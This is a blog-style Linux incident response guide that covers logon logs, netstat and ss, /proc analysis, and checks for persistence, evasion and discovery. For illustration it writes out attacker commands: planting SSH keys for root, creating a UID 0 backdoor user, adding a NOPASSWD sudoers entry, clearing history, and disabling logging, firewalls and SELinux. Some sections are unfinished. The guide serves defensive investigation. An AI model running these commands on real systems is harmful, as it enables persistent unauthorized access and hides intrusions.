top of page

Incident Response - Linux

brencronin

Updated: 3 days ago

Linux Incident Response Approach Overview


When conducting incident response on Linux systems, certain types of analysis can be performed quickly and effectively using built-in Linux tools. This initial analysis often provides insights into how the system was compromised and the actions taken during the breach. However, advanced threat actors may employ techniques that complicate the investigation, requiring more time-consuming and sophisticated analysis methods.


This Linux analysis guide begins by focusing on straightforward checks that can yield quick results. Using a baseball analogy, it's like taking a home run swing at the easy targets first. If these initial steps don’t provide definitive answers, the investigation can progress to more advanced techniques for deeper analysis.


Often Linux systems are compromised by attackers through cracked credentials, stolen credentials or compromised credentials. For this reason, one of the first steps in a Linux investigation is examining logon activities:


Examining logon activities


If suspicious login activities are detected or a compromised account shows unusual activity, the analysis should focus on identifying when the threat actor accessed the system. Investigators can then examine the actions performed, using the compromised account, to determine what systems or data were accessed and what activities were carried out.

Whether suspicious logons are found one of the next quickest system checks is to look for suspicious network connections:


Looking for suspicious network connections


The investigation may begin with suspicious network connections, either triggered by alerts from network-based instrumentation and telemetry or identified during system analysis. This step is crucial because if a threat actor installs malware that provides remote access, the system can be accessed without a separate login. Analyzing network activity is often key to identifying malware backdoors and understanding the threat actor's access methods.

If a suspicious network connection is identified, the associated program can be traced by analyzing the /proc file system to determine which binary initiated the connection. Once located, the binary can be further examined to uncover potential malicious behavior or intent.

For compromised systems the following are activities that the threat actor will likely engage in. Different threat actors may have different tradecraft for the sequence that they perform these activities. Indications of certain of the below activities, or combinations, could immediately raise likelihood that the incident is a true positive.


  • Search for signs of persistence

  • Search for signs of defense evasion

  • Search for signs of discovery

  • Search for signs of Command & Control

  • Search for signs of privilege escalation

  • Search for signs of lateral movement

  • Search for signs of exfiltration


In certain investigations, forensic analysis is essential. For instance, memory analysis can reveal memory-resident malware like processes that have deleted disk binaries running in memory, including volatile processes and network data loaded into memory. It can also help detect rootkits, which are often adept at evading live response or disk-based analysis.

In the examples below, red text highlights potential malicious actions performed by a threat actor, illustrating how specific techniques might be executed. Purple text provides examples of using Linux system tools for investigative purposes.


Logon History


Logon success and failures can be found in multiple places within the system.

/var/log/wtmp
/var/log/btmp
/var/log/lastlog
/var/log/audit
/var/log/journal
/var/log/secure

/var/log/wtmp


The /var/log/wtmp file stores a record of login sessions and reboots. It is in a special binary format, so you have to use the last command to dump out information

last -if

The “-i” flag shows IP addresses (-a shows hostnames in last column) rather than hostnames, and “-f” allows you to specify a file path that is not the default /var/log/wtmp file. last shows the newest logins first


(local text-mode console of the system– “tty1” (if the login had occurred on the graphical console you would see “:0” in the IP address column))


Logon counts by user users.

for user in `ls /home`; do echo -ne "$user\t"; last $user | wc -l; done

Logon times by user

for user in `ls /home`; do ac $user | sed "s/total/$user\t/" ; done

/var/log/btmp


The btmp file stores information about failed logins, but it does not exist by default. Many administrators choose not to enable btmp logging because it can sometimes disclose user passwords– how many times have you accidentally typed your password into the username field? If you have a btmp file, you can read it with the lastb command

 lastb -if

/var/log/lastlog


The lastlog file stores last login information for each user on the system. The file can appear to be huge, but it is actually a sparse file– the offset to any user record is their UID times the size of the lastlog record. You read the file with the lastlog command, which simply goes line by line through the password file and dumps the lastlog record for each UID it finds there. That means if you are not using the password file from the system the /var/log/lastlog file was taken from, or if you are but there were existing user accounts that have been deleted from that password file, then you may not be seeing all the data in the file


/var/log/audit


The audit log has a lot of data and can also be difficult to read, and Linux has some specialized audit log search tools like ausearch.


One thing to watch for in the example below. If you are searching the audit log for SSH connections from threat actor IPs it is easy to drill in on the res=success, which stands for result=success.

.......lport=<IP Host you are investigating> lport=22 exe="/usr/sbin/sshd" hostname=? addr=<threat actor IP> terminal=? res=success'

But if you look earlier in the log line you will see it also has the output below. This basically means that someone tried to make an SSH connection, it failed, so the process for it was destroyed.

....msg='op=destroy kind=session fp=? direction=both....

/var/log/journal

journalctl SYSTEMDUNIT=sshd.service | grep "error"

/var/log/secure


The /var/log/secure file logs security-related activities on a Linux system, including: Authentication Events (e.g., via SSH or local logins), Privilege Escalation (Commands executed using sudo), Service Authentication (Authentication attempts for services like SSH (sshd) or other system services requiring credentials), and Account Activity (Changes to user accounts or authentication configurations). By reviewing /var/log/secure, administrators can track who is accessing the system, identify failed login attempts, and monitor the use of elevated privileges. Log analysis often involves sifting through thousands of entries. If you have a specific IP address to investigate, you can filter the logs to focus on that address. Otherwise, you'll need to review multiple entries and apply logical filtering strategies to align with your investigation objectives. Below are examples of successful and failed SSH login attempts found in the /var/log/secure log:

Cat /var/log/secure | grep sshd | grep 192.168.1.100
MMM DD HH:MM:SS server1 sshd[SSH daemon process ID]: Accepted password for user1 from 192.168.1.100 port 22 ssh2
Cat /var/log/secure | grep sshd | grep 192.168.1.100
MMM DD HH:MM:SS server1 sshd[SSH daemon process ID]: Failed password for root from 192.168.1.101 port 22 ssh2

Note, you will have to check sshd_config file to determine if a system administrator or threat actor configured the server SSH service to listen on non-standard SSH ports.

grep Port /etc/ssh/sshd_config
Port 2222

Look for suspicious network


The built-in Linux tool netstat is a powerful utility for analyzing network connections. It offers numerous command options, which can be found in the manual: netstat man page: https://linux.die.net/man/8/netstat


The netstat command provides detailed information about network connections on a system, including listening ports and established connections. However, its output can be overwhelming, making it challenging to distinguish legitimate connections from potentially malicious ones.


The netstat output is rarely a definitive indicator of malicious activity on its own unless you’re investigating a specific remote connection identified through other tools or telemetry. If you have additional information, such as suspicious IP addresses or unusual port numbers, you can streamline your analysis by filtering the output with tools like grep.


Without a specific indicator of compromise (IOC), reviewing the netstat output can be tedious. Applying filters to exclude irrelevant data and focus on potentially suspicious connections can significantly simplify the process and make the analysis more efficient.


Examples of useful netstat commands:


  • netstat -pt: Displays network connections with associated processes.

  • netstat -tanp: Provides detailed information, including TCP connections, listening ports, and associated processes.

  • netstat -ltnup:

    • l – show only listening sockets

    • t – show TCP connections

    • n – show addresses in a numerical form

    • u – show UDP connections

    • p – show process id/program name


If you’re investigating a particular remote connection, use grep to filter netstat output for the IP address of interest:

netstat -pt | grep <IP_ADDRESS>

Filtering for Active Connections:


To identify active connections, filter for the keyword ESTABLISHED. The -i option in grep makes the search case-insensitive:

netstat -pt | grep -i ESTABLISHED

Remove unnecessary entries, such as those related to the system loopback address, using the -v option in grep. Services shown bound to 127.0.0.1 or ::1 indicate localhost. These are accessible from the local machine only and is often setup for system backend services.:

netstat -pt | grep -v 127.0.0

Combining filters can streamline analysis:

netstat -pt | grep -i ESTABLISHED | grep -v 127.0.0

When investigating, identify and document the port number associated with suspicious connections. While threat actors often use non-standard ports for malicious activities, analyzing ports in the broader context of the investigation can provide valuable insights.


Pay particular attention to the port number in the "Foreign Address" field, which represents the remote end of the socket. If malware is establishing a reverse shell connection, the local system being investigated will appear as the "Local Address," and the potentially malicious remote server will be listed as the "Foreign Address." Understanding this distinction is critical for accurately tracing and evaluating suspicious network activity.


If a suspicious network connection is identified, one of the key aspects to analyze is the process ID (PID) responsible for initiating the connection. In the netstat output, this is displayed as a slash-separated pair of the PID and the process name associated with the socket.


If the active process behind the suspicious connection is not identifiable using netstat, alternative built-in Linux tools can be used. The ss command (socket statistics) is particularly useful for uncovering details such as the port number associated with the connection. Additionally, the lsof (list open files) utility can help identify processes tied to specific network connections. For further details on ss and lsof, you can refer to the https://man7.org/linux/man-pages/man8/ss.8.html https://man7.org/linux/man-pages/man8/lsof.8.html These tools provide more flexibility and granularity for analyzing suspicious network activity.

ss -tp | grep <IP of connection you are researching>

Example output of ss.

ESTAB     <server IP investigating:High port>  <Remote suspicious IP:serviceport    users:(("program name",pid<process #>,fd=1))

example lsof command.

lsof -i:<port #>

Once you have identified the process ID (PID) associated with the suspicious or confirmed malicious connection, you can conduct a deeper investigation into the process to gather additional insights.


It's important to recognize that if the system under investigation is compromised by a rootkit, the rootkit often conceals its malicious activity, such as IP addresses, ports, and process IDs, from the output of built-in Linux tools like netstat.


Analyzing the Linux /Proc FileSystem for suspicious binary


Host-based incident response prioritizes analyzing processes associated with suspicious activities to uncover unusual or anomalous indicators. Effective host analysis goes beyond identifying distinct behaviors, delving into detailed scrutiny of these processes. A critical resource in this effort is the /proc file system. Unlike traditional file systems, /proc does not store data on physical devices; instead, it operates as a virtual file system dynamically generated by the kernel. When a user accesses a file within /proc, the kernel creates its contents in real-time and delivers them to the user, providing invaluable insights during investigations.


The /proc directory contains subdirectories for each process, named /proc/<process ID>, where each subdirectory holds files and data related to the specific process. Most Linux tools that display process information, such as ps, gather their data from the /proc filesystem. Key files and subdirectories tracked for each process include:


  • exe: A symbolic link to the executable file that started the process.

  • cmdline: A file containing the command line arguments used to start the process.

  • cwd: A symbolic link to the current working directory of the process.

  • status: A file with various status information about the process, such as its state (e.g., "Sleeping"), process ID, and parent process ID.

  • environ: A file containing the environment variables set when the process was started.

  • fd: A directory containing symbolic links to the open file descriptors of the process.

  • maps: A file listing memory regions mapped by the process.

  • mem: A file containing the process's memory image; reading this file reveals the contents of the process's memory.

  • stat: A file containing various statistics about the process.

  • task: A directory containing information about the threads (tasks) that are part of the process.


When examining these files with tools like ls -l, you may notice many appear empty. This is because the contents of /proc are dynamically generated by the kernel in real-time. To view their contents, you need to use tools like cat. Additionally, some files contain binary data or are links to binary data, which cannot be viewed with a standard text editor.


[image]


Key steps for quickly analyzing /proc/<process ID> files include:


  • Checking the parent process ID (PPID) to identify the process that spawned the suspicious process.

  • Hashing the binary associated with the suspicious process.

  • Running strings on the binary to extract readable data.

  • Reviewing the cmdline file to see the command-line arguments used to start the process.


Checking the parent process ID (PPID) to identify the process that spawned the suspicious process.


The parent process ID can be found with pstree or the /proc filesystem.


Using pstree to find the parent process ID of the suspicions process.

pstree -aps <PID>

Using the /proc file system to find the parent process ID of the suspicious process.

cat /proc/<PID>/status

Once the parent process ID (PPID) is identified, you can further investigate that process. If the PPID is 1, it is the system management daemon also rereferred to as the init process, which is the root of the Linux process tree. Init is the first user-mode process created on boot and remains running until the system shuts down. It manages system services (daemons) on the system. There are various implementations of init on Linux, including systemd, sysv, busybox, and launchd. This analysis will focus on systemd, as it is the most commonly used init system in modern Linux distributions.


Hashing the binary associated with the suspicious process


Pull the binary hash and search in CTI

md5sum /proc/<PID>/exe
sha1sum /proc/<PID>/exe

If the hash is malicious it can serve as IOC for searching the system or other systems.

sudo find /bin/ /sbin/ -type f -exec md5sum {} \; | grep <suspicious md5 hash>

Running strings on the binary to extract readable data.


When analyzing the binary in an editor you will main just see binary data, but sometimes the binary has strings like IP addresses, URLs, and other keywords in ascii text.

strings /proc/<PID>/exe

Pulling IP addresses from strings.

strings /proc/<PID>/exe | grep -aoE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"

Reviewing the cmdline file to see the command-line arguments used to start the process.

cat /proc/<PID>/cmdline

Linux ps


The built-in Linux tool 'ps' (Process Status) can also be used to find information by process ID. the ps command is actually pulling its data from the /proc directory.


ps -p <Proc ID>
ps -p <Proc ID> -o command

Linux strace


Another valuable tool for analysis is strace, which allows you to trace system calls (syscalls) made by a process. Syscalls serve as the interface between a service and the kernel, enabling services to request kernel-level operations. Analyzing these syscalls can reveal how malware interacts with the system and provide insights into its behavior and operations.


Strace is a powerful utility for observing and debugging a program's interactions with the operating system. When using strace to analyze malware, ensure that the system is isolated to prevent unintended consequences or propagation.


Here are examples of running strace for analysis:


strace on a PID.

strace -p <PID>

strace n a service saving the output to a file.

strace -o output.txt ./service:

strace on the system for all network connections using a specific port.

strace -f -e trace=network nc -lu 22

Search for signs of persistence


Persistence - SystemD


One of the simplest methods for achieving persistence in Linux is configuring a program to auto-start on boot, much like built-in system services. In Linux, the systemd service manager oversees these startup programs. Each program or process managed by systemd is referred to as a unit. Units dictate how services start and run, and they include configuration files that specify actions like start, stop, or restart. To enable a process to start automatically, the following criteria must be met:


  1. Integration with systemd: The process should have a service unit file, typically located in /etc/systemd/system/, with a .service extension.

  2. Manageable with systemctl: The service must be controllable via systemctl, which is the primary interface for managing systemd services.

  3. Startup configuration: The service must be configured to launch automatically during system startup.

  4. System journal logging: The process should write logs to the system journal for monitoring and troubleshooting.


Systemd supports multiple types of units, such as:


  • Service: For managing system services (e.g., nginx.service).

  • Socket: For listening to network sockets.

  • Device: For managing hardware devices.

  • Mount: For filesystem mount points.

  • Target: For grouping services.

  • Timer: For scheduling tasks.


Taken from the article, https://javelinsoft.medium.com/creating-a-persistent-ssh-tunnel-using-systemd-b24deef457df, this is an example a unit file for a service names sshtunnel.service. The service unit have three main sections [Unit], [Service], and [Install]. Each section then has 'directives' under it.


[Unit]
Description=SSH Tunnel
After=network.target
[Service]
User=root
ExecStart=/usr/bin/ssh -i /path/to/your_private_key -N -L *:local_port:localhost:remote_port username@remote_host
Restart=always
RestartSec=5s
StartLimitInterval=0
[Install]
WantedBy=multi-user.target
Alias=SSHTunnel.service

Pay close attention to directives that start with Exec, because these are special directives that specify actions and scripts to be run when certain activities happen with the service like service start, stop and reload.


Unit files can be in different locations on the system depending upon how they were installed. Systemd uses all these directories and if there is a conflict the unit files within the /etc have the highest priority.:


  • /usr/lib/sysytemd/system/ or /lib/sysytemd/system/: If installed by the Linux package management system.

  • /etc/systemd/system/: If service configured by system administrator. These are important to note because they were explicitly added.

  • /usr/lib/sytemd/user/: Linux users unit files.

  • /etc/systemd/user/: System administrator unit files

  • ~/.config/systemd/user/: Users unit files within their home directory used during a users login session.

  • /run/systemd/system/: Unit files created at run time. This directory takes precedence over the directory with installed service unit files.

  • Unit files can also include directories with service-specific .conf files.

  • Unit file paths can be viewed with 'systemd-analyze unit-paths' (system mode services),

systemd-analyze unit-paths
  • Unit file paths can be viewed with 'systemd-analyze unit-paths --user' (user mode). Important because a user with lower privileges can setup sysemD persistenece through these directpories.

systemd-analyze unit-paths --user

For example, if nginx is installed, its service unit file would typically be named nginx.service. Each unit defines how the system starts, manages, and logs the service. Understanding these locations and configurations is key for analyzing and managing system persistence.


Systemd Timers


  • Separate unit files

  • have independent execution capability


[Unit]
[Timer]
OnBootSec=10m
OnUnitActiveSec=1M
[Install]
Wantedby=timers.target

Analysis of services can be done:


  • Using systemctl

  • Analyzing service logging in the journal

  • Analyzing the service unit files directly


Using systemctl to analyze services


systemctl is the builtin Linux tool for interacting with systemd, and is the tool that admins would use to troubleshoot, start, stop and restart services.


To list all active services, sockets, targets, mounts, and devices, for usermode services.

sudo systemctl list-unit --type=service --User

To list all active services, sockets, targets, mounts, and devices.

sudo systemctl list-unit --type=service

To list all service files, you can use:

sudo systemctl list-unit-files --type=service

Checking services by state.

systemctl list-unit-files --state=<state>

Services enabled.

systemctl list-unit-files --type=service --state=enabled

Checking the status of the service file:

systemctl status -l <service name>

Analyzing the service unit file.

systemctl cat <service name>

Analyzing the service by PID.

systemctl status <PID>

Look for 'Active since' could provide information on start of infection.


Analyzing service logging in the journal


journald is the daemon from systemd that collects the logs from various log sources.

journalctl is the built-in tool that lets you interact with the journal logs.

journalctl -u service_name
journalctl -f -u service_name

Searching for time ranges.

journalctl --since "YYYY-MM-DD HH:MM:SS" --until "YYYY-MM-DD HH:MM:SS"

Analyzing the service unit files directly


The service unit file can also be examined directly if its location is known, most commonly in the /etc/systemd/system/ directory.

cat /usr/lib/sysytemd/system/<service-unit name>
ls -la /etc/systemd/system
ls -la /lib/systemd/system
ls -la /run/systemd/system
ls -la /usr/lib/systemd/system
ls -la /home/*/.config/systemd/user/

find / -path "*/systemd/system/*.service" -exec grep -H -E "ExecStart|ExecStop|ExecReload" {} \; 2>/dev/null
find / -path "*/systemd/user/*.service" -exec grep -H -E "ExecStart|ExecStop|ExecReload" {} \; 2>/dev/null

Note: With the migration to systemd, scripts that normally need to be implemented in /etc/init.d/ can now be implemented with systemd services. However, the /etc/init.d/ is often kept for backward compatibility. Startup services are often managed through configuration files located in the init.d directory:

ls /etc/init.d

Persistence - Cron Jobs

/etc/crontab
/etc/cron.d/*
/etc/cron.{hourly,daily,weekly,monthly}/*
/var/spool/cron/crontab/*

Loop through all users cron files.

sudo bash -c ‘for user in $(cut -f1 -d: /etc/passwd);
do entries=$(crontab -u $user -l 2>/dev/null | grep -v “^#”);
if [ -n “$entries” ];
then echo “$user: Crontab entry found!”;
echo “$entries”; echo; fi; done’

searching logs for cron executions

sudo grep cron /var/log/syslog

Persistence - Shell Profiles


Unix shells use various configuration scripts that execute when a shell starts or ends. These scripts can be manipulated to run commands or reverse shells during user login events, creating potential backdoors. Examining these scripts is critical for identifying unauthorized modifications or malicious entries. Key shell configuration files to review:


System-wide files:


  • /etc/profile: Executed at the start of login shells.

  • /etc/profile.d/: Executes all .sh files at the start of login shells.

  • /etc/bash.bashrc: Executed at the start of interactive shells.

  • /etc/bash.bash_logout: Executes when a login shell exits.


User-specific files:


  • ~/.bashrc: Executes at the start of interactive shells.

  • ~/.bash_profile, ~/.bash_login, ~/.profile: User-specific startup scripts; only the first file found is executed.

  • ~/.bash_logout: Executes at the end of a user session for cleanup tasks.


cat /home/*/{.bashrc,.zshrc}
ls -la /home/*/{.bashrc,.zshrc}

Persistence - Adding a public key to authorized keys for SSH access.


The authorized_keys file can be placed in the <home>/.ssh/ directory of each user you want to backdoor. Two example users.

root:x:0:0:root:/root:/bin/bash
user1:x:1000:1001::/home/user:/bin/bash

Add authourized_keys file to:

/home/user1/.ssh/authorized_key
/root/.ssh/authorized_keys

Adding key to file.

echo "ssh-hackerkey " >> /home/user1/.ssh/authorized_keys
echo "ssh-kackerkey " >> /root/.ssh/authorized_keys

Searching for keys.


for home_dir in /home/*; do [ -d "$home_dir/.ssh" ] && echo "HOME \"$(basename "$home_dir")\""; [ -d "$home_dir/.ssh" ] && cat "$home_dir"/.ssh/*; done
ls -la -R /home/*/.ssh
*/.ssh/*

Persistence - /etc/passwd Modification: Directly adding users to /etc/passwd.


Coud be new (admin) accounts added or unlocking application role accounts. Leveraging existing accounts can be common; particularly application accounts like www or mysql that are normally locked. If the attacker sets a re-usable password on these accounts, they could use them to access the system remotely.


/etc/passwd file overview


Each field is separated using the colon “:” character in which the fields represent the following passwd file format:


  • Username

  • Password Placeholder (x indicates encrypted password is stored in the /etc/shadow file)

  • User ID (UID)

  • Group ID (GID)

  • Personal Information (separated by comma’s) –can contain full name, department, etc.

  • Home Directory

  • Shell –absolute path to the command shell used (if /sbin/nologonthen logon isn’t permitted, and the connection gets closed)


Add a password and let wwww-data be a sudo-er

sudo passwd www-data  
sudo usermod -aG sudo www-data

Then allow www-data to ssh. Modify /etc/passwd from nologon to bash.

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
//change to
www-data:x:33:33:www-data:/var/www:/bin/bash

Persistence - Backdoor User: Creating a backdoor user with uid=0 (root privileges).


Added testuser

sudo adduser testuser   
cat /etc/passwd | grep testusertestuser:x:1001:1001::/home/testuser:/bin/sh

Change the UID of testuser to 0.

sudo usermod -u 0 -o testuserhost
:/$ cat /etc/passwd | grep testuser
testuser:x:0:1001::/home/testuser:/bin/sh

Any account with user ID zero has admin-level access. Normally there should be only a single “root” account with UID 0 in the password file, but multiple UID 0 accounts are allowed. Sorting the passwd file numerically by UID, so it will be easy to see UID 0 accounts

sort -t : -k 3 -n /etc/passwd

Persistence - Sudoers Backdoor: Adding a user to sudoers for root commands.


The Linux sudoers 'super user do' file defines permissions for users and groups to execute commands with elevated (root) privileges using the sudo command. It controls who can use sudo, what commands they can execute, and on which hosts. Properly configuring the sudoers file enhances system security by granting least privilege access. Threat actors will want to add users and edit this file to ensure that a compromised account they may use has elevated access.



vi /etc/sudoers
<compromised account> ALL=(ALL) NOPASSWD: ALL

Format for each line is:


 <Who> <OnWhich Systems> <commands and parameters>


Persistence - Package Manager Persistence: Leveraging APT/YUM/DNF package managers.


Packages may include scripts or binaries that install backdoors, execute malicious code, or escalate privileges. Common techniques include:


  • Repository Poisoning: Hosting or compromising a repository to distribute malicious packages.

  • Fake Packages: Creating packages with names resembling legitimate ones to exploit user mistakes.

  • Post-Installation Scripts: Embedding malicious commands in pre- or post-installation scripts that execute during package installation.

  • Dependency Hijacking: Adding malicious dependencies to otherwise legitimate packages.


Once installed, these backdoors can provide persistent access, execute commands, or exfiltrate data, often disguised as legitimate system processes or files.


Items to check related to packages include:


  • Packages installed and their versions?

  • Installation information (Who, when, how)?

  • Packages upgraded?

  • Packages removed?

  • Repos used?

  • Package integrity verification

  • For ma suspicious file can the package it belongs to be determined?


The log for package related activity.

/var/log/dpkg.log

or

/var/log/apt/history.log
/var/log/apt/term.log

Examining details related to a specific package.

awk ' /^Packages: <package name>$/ , /^$/ ' /var/lib/dpkg/status

Search for signs of defense evasion


Adding timestamps is useful when examining shell histories.

export HISTTIMEFORMAT="%F %T "
  • %F will show the date in YYYY-MM-DD format.

  • %T will show time in HH:MM:SS format.


Defense Evasion - Hiding or Clearing Shell History


The Threat Actor may also try to hide their shell history. Some common examples are clearing the History file history -c; Clearing the History file variable so no data can be store there unset HISTFILE; programming the Histfile to ignore certain commands export HISTIGNORE; setting the HISTFILE to log a smaller number of commands (default is 500) export HISTFILESIZE=10 : https://digi.ninja/blog/hiding_bash_history.php, https://www.cyberciti.biz/faq/disable-bash-shell-history-linux/

history -c
unset HISTFILE 
export HISTIGNORE="ls*:cat*"
export HISTFILESIZE=10
history -d <line number>

Finding history files set to /dev/null

ls -alR / 2> /dev/null | grep .*history | grep null

Preventing history logging at the start of a new shell.

echo "unset HISTFILE" >> ~/.bash_profile; echo "unset HISTFILE" >> ~/.bashrc;

Clearing history at logout

echo "history -c" >> ~/.bash_logout

Leave bash history enabled but misconfigured. use a space in front of your commands and it won't be logged.

HISTCONTROL=ignoredups:ignorespace

Consider changing users .bash_history so they cannot delete it.

sudo chattr +a .bash_history

Defense Evasion - Log tampering

service resyslog stop
systemctl disable rsyslog
/etc/init.d/syslog stop

Example of audit log recording stopping a service.

ausearch -i 13 -m execve -k "systemctl stop <service>"

The audit log can also bs searched for manipulation to key audit log settings.


/etc/audit/auditd.conf - Global settings for the audit daemon

/etc/audit/rules.d/<rules> - audit rules defining specific events and conditions for monitoring

/etc/audisp/audispd.conf - Configures the audit event dispatcher

/etc/libaudit.conf - Manages library-level settings for the audit framework


Defense Evasion - Disabling Linux Firewalls


Firewall D

systemctl stop firewalld
systemctl disable firewalld

IPTables

service iptables stop

(Note: An advanced tactic could also be to add or edit specific firewall rules).


Defense Evasion - SE Linux

setenforce 0

Search for signs of discovery


Linux systems offer a vast array of built-in shell commands and utilities that threat actors can leverage to achieve their objectives. As a result, Linux-specific malware is often unnecessary on compromised systems; instead, attackers commonly rely on script files that misuse standard Linux utilities in malicious ways. Many of these utilities exploited for nefarious purposes are cataloged in the Linux "Living off the Land" project, also known as GTFOBins: GTFObins: https://gtfobins.github.io/


Here are examples of potentially suspicious shell commands. However, keep in mind that legitimate administrative tasks or scripts may also use some of these commands. Effective analysis relies on understanding the context in which these commands are executed.


Threat Actors will want to know the system they are on to determine if it has an exploitable vulnerability.

uname -r
cat /proc/version
cat /etc/os-release

The Threat Actor will also want to know the user context they are in the system as:

whoami

Threat actors will want to know the shell they are in (90% of the time it will be rbash):

echo $SHELL

Check for the Environmental Variables:

run env

or

printenv

The Threat Actor may also want to look at the user hashes and copy them out for cracking : https://www.cyberciti.biz/faq/understanding-etcshadow-file/

cat /etc/shadow

/etc/Shadow overview


Like the passwd file, each field is separated by a colon “:” and the format of the shadow file is the following:


  • Username

  • Password (typically encrypted in a one-way hash format) such as:

    • $1$ is MD5

    • $2a$ is Blowfish

    • $5$ is SHA-256

    • $6$ is SHA-512

  • Last password change

  • Minimum password age

  • Maximum password age

  • Warn period

  • Inactivity period

  • Expiration date

  • Unused field


Search for signs of Command & Control


Linux - Web Activity Related Commands


On Linux servers, web-based connections initiated through command-line tools can be a red flag, as servers typically don’t have users browsing the web. Threat actors often use these commands to download and install additional software or tools, making such activity a potential indicator of malicious behavior.

Both cURL and wget allow attackers to easily change the user agent string, which can indicate defense evasion tactics. This is why knowing the normal patterns in your environment is crucial. For example, if you typically see web requests from Linux systems using the default cURL user agent, any deviation from this should raise a red flag and prompt investigation into why the traffic is using a different user agent string. You can also add to your detection strategy to alert if shell commands are run where someone is trying to change the user agent string value. For example, Curl with hyphen A ;-) switch and wget with -user-agent string switch.

curl -A "user-agent-name-here"
wget --user-agent="user-agent-name-here"

Bind Shell/Web Shell: Running a bind shell in the background for remote access.


The attacker’s machine acts as a client and the victim’s machine acts as a server, which opens a communication port and waits for the client (attacker) to connect to it, and then issues commands to be executed remotely on the victim’s machine.


grep -rlE 'fsockopen|pfsockopen|exec|shell|system|eval|rot13|base64|base32|passthru|\$_GET|\$_POST\$_REQUEST|cmd|socket' /var/www/html/*.php | xargs -I {} echo "Suspicious file: {}"

Web Server files


???apache, nigning>


access.log


cat access_log | cut -d’ ‘ -f11 | cut -d ‘/’ -f3 | sort | 
uniq -c | sort -nr | head -10


error.log


Fefault apache log format:


%h %1 %u %t \%r\ "%s %0\%{Referer}i\" \%{User-Agent}i\"" combines


%h - remote host/IP

%1 - Remote logname

%u - Remote user

%t - Time the request was received

%r - First line of the request

%s - Status code

%0 - Bytes sent, including headers

%{header}i - Contents of specified header in the request


Search for signs of privilege escalation


The first key to understanding privilege escalation is knowing your systems privileged accounts, how they are managed, and how they are used.


  • The King of Linux “root”

  • The Secret Keys of Linux “the Private SSH key”

  • sudoers users and setuid/setgid

  • System Admin Accounts

  • Emergency Accounts

  • Service Accounts such as www-data

  • Elevated “Dev Accounts”

  • Privileged Data User Accounts


Common techniques for escalating privilege.


  • Kernel exploits

  • Application vulnerabilities

  • Misconfigurations such as weak file permissions

  • Abuse of sudo

  • Abuse of setuid and setgid

  • Cron jobs

  • Poor passwords


Automated tools to find privilege escalation paths in Linux.


  • LinEnum–Linux Enumeration Script

  • LinPEAS-Linux Privilege

  • Escalation Awesome Script

  • Linux Smart Enumeration

  • Linux Exploit Suggester 2



Special Permissions (first bit in permissions) has the

following options:

1.-–no special permissions set

2.d –directory

3.l –file has symbolic links

4.s –setuidor setgidis set

5.t –sticky bit se


Search for signs of lateral movement


???


Search for signs of exfiltration


???

Finding zip files


The the most common compression types used in Linux are:


.zip files

.tar files

.tar.gz files

.tar.bz2 files

find / -iname .rar -or -iname .zip -or -iname .7z -or -iname .tar -or -iname .bx2 -or -iname .gz -or -iname *.zipx 2>/dev/null


Unix Like artifact collector


In Linux Incident Response (IR), identifying persistence mechanisms is crucial for detecting threat actors. One effective tool for analyzing persistence is the Linux PANIX tool, a versatile and highly customizable resource for security research, detection engineering, and penetration testing. You can find it here:: https://github.com/Aegrah/PANIX?utm_source=substack&utm_medium=email


Other Linux items to check


???


Linux Searching for file modifications

(Taken from Hal Pomefranz)


Walk downwards from the given directory and display all files and directories modified (“-mtime”) less than seven days (“-7”, “more than seven” would be “+7”) ago

 find /dirpath/dirpath/dirpath -mtime-7

Find options like “-mtime” only work on one day granularity, the “-newer” option lets you discover files that were modified after some other file. This is helpful if you can pinpoint early modifications by the attacker in the file system. First, create your own timestamped file

Use the timestamped file with -newer argument that enables you to an establish an exact base time you want to search forward from with more granularity than “-mtime”

find /dirpath/dirpath/dirpath -newer /dirpath/dirpath/dirpath/<touchstamped file>

Sorted by mtime, oldest first. “ls -rt” is a reverse sort by time (oldest to newest), “-l” gives file details. “-A” shows “hidden” files whose name starts with a period

ls –lArt /dirpath/dirpath/dirpath

Other Investigative Items


  • ‘Lost+Found” becomes a good proxy for when the file system was created (e.g., OS installed)

stat lost+found
  • Many exploits leverage /tmp and /dev/shm directories on Linux systems because they are typically world-writable. Any process operating from /tmp or /dev/shm should be considered suspicious and warrants further investigation.

    • Look for randomness. Syntax of random string letters is eye opening because malware will do this through a function to ensure they don’t conflict with system files.

    • Processes running from tmp or dev

ls -alR /proc/*/cwd 2> /dev/null | grep tmp 
ls -alR /proc/*/cwd 2> /dev/null | grep dev
  • Executables anywhere in tmp.

find / -type f -exec file -p '{}' \; | grep ELF
find /tmp -type f -exec file -p '{}' \; |  grep ELF

  • Common targeted directories are /tmp, /var/tmp, /dev/shm, /var/run, /var/spool, user home directories

  • Examination of /etc. Creation and modification times of files could indicate when a particular configuration was added to the system.

  • Immutable files

  • Hidden files

 find / -type d -name ".*"
  • Deleted binaries still running

ls -alR /proc/*/exe 2> /dev/null | grep deleted
  • Changes to /etc/ssh/sshd_config . For example, listening to ssh on other ports.

  • Search the system for malware hashes. Create recursively md5 hashes from all files in that directory:

??? find ./backup -type f -print0 | xargs -0 md5sum > /checksums_backup.md5
  • Use ldd on suspicious binaries to see what shared objects they have.

  • Common locations to check for userland rootkits.

/lib/x86_64-linux-gnu
/lib/*
/usr/lib/x86_64-linux-gnu
/usr/lib/*
ls -la /etc/ld*
cat /etc/ld.so.preload
ldd /bin/ls
ldd /bin/bash
ldd /usr/bin/ssh
ldd /usr/bin/netstat
ldd /bin/* #check for shared object in binary, which you suspect
ldd /usr/bin/* #check for shared object in binary, which you suspect
/proc/*/maps

Linux Root Kits


Rootkits often hook system functions to hide files, directories, and processes, making them challenging to detect during investigations. Since Linux exposes process information through the /proc filesystem, rootkits can manipulate it to conceal malicious processes. However, detection methods, both with built-in tools and specialized rootkit scanners like RKHunter, unhide, tracee ebpf, and chkrootkit, can uncover rootkits. Here are two common rootkit detection techniques using native Linux tools:


Directory Link Count Anomalies


The Linux filesystem tracks the "link count" for all objects, including directories. The link count for any directory is always at least two:


  • ./: Points to the current directory.

  • ../: Points to the parent directory.


Additionally, each subdirectory increments the parent directory's link count by one. This means:


Link Count = 2 + Number of Subdirectories


  • To verify this, use ls -l to view the link count and ls -a to display all hidden directories (./ and ../).


Rootkits often hook tools like ls to hide files and directories. However, they struggle to manipulate the link count consistently. If the link count doesn’t match the visible subdirectories (minus two), it may indicate a hidden directory, suggesting the presence of a rootkit. Rootkits typically fail to manage link counts without significantly increasing their complexity, making this an effective detection method.


